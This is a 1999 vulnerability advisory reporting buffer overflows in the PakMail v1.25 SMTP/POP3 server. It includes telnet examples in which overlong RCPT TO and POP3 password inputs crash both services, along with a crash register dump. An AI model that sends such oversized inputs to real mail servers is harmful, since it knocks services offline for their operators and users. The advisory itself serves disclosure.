Vulnerable Program: PakMail v1.25 SMTP/POP3 Server
Platform          : Windows95, 98, NT
Vendor            : SilverSoft Corporation (www.pak.net)
Impact            : Remote/local users can DoS both STMP & POP3 servers
Found by          : slackee ( warminx@null.rewted.org )
Date              : 5th December '99


PakMail SMTP/POP3 Server
________________________

Pakmail V1.25, a state of the art POP3 and SMTP server, brings mail services common on 
Unix hosts and the Internet to Windows based micro-computers. This server is suited to 
corporate bodies and ISP's dealing in mail management. PakMail provides the following 
features. 

.User friendly maintenance of accounts 
.High performance yet low CPU usage 
.Mail Forwarding 
.Mailing Lists 
.Realtime status information 
.Debug logging 
.Powerful SMTP and POP3 builtin clients 
.Transparent SMTP and POP3 mail gateway. 
.Powerful yet easy management of sub-domains 


Vulnerability
_____________

Rewted Network Security Labs found a local/remote DoS attack in PakMail SMTP and POP3
servers, the buffer overflow is caused by a long username specifed for the `RCPT TO:` 
field, in the SMTP server.

Example: 

telnet localhost 25
220 jedi PakMail Mail Server ready at Sun, 05 Dec 99
mail from: test@localhost
250 test@localhost Sender Ok
rcpt to: $buffer@localhost

where buffer, is roughly 1390 characters. The server will shutdown with an illegal operation
and can no longer be used, until restarted. The error is as follows:

PAKMAIL caused an invalid page fault in
module KERNEL32.DLL at 0137:bff9a5d0.
Registers:
EAX=c001743c CS=0137 EIP=bff9a5d0 EFLGS=00010212
EBX=0159ffb8 SS=013f ESP=0149ff38 EBP=014a01d4
ECX=00000000 DS=013f ESI=00000000 FS=4717
EDX=bff7678c ES=013f EDI=bffb8e70 GS=0000
Bytes at CS:EIP:
53 8b 15 7c c2 fb bf 56 89 4d e4 57 89 4d dc 89 
Stack dump:

Likewise, the POP3 server is also vulnerable to a similar attack, except the buffer overflow
occurs when an extra long `pass` field is entered. The buffer for this is approx 1400 chars.
PAKMAIL will crash with an almost identical error.

Example:

telnet localhost 110
+OK PakMail on (jedi) at (Sun, 05 Dec 99)
user test
+OK
pass $buffer

The program will then terminate.


Solution
_____________

Silversoft Corporation has been notified about this, so either wait for a patched release
or switch smtp/pop3 servers.

________________________________________________________
r e w t e d   n e t w o r k   s e c u r i t y   l a b s
http://www.rewted.org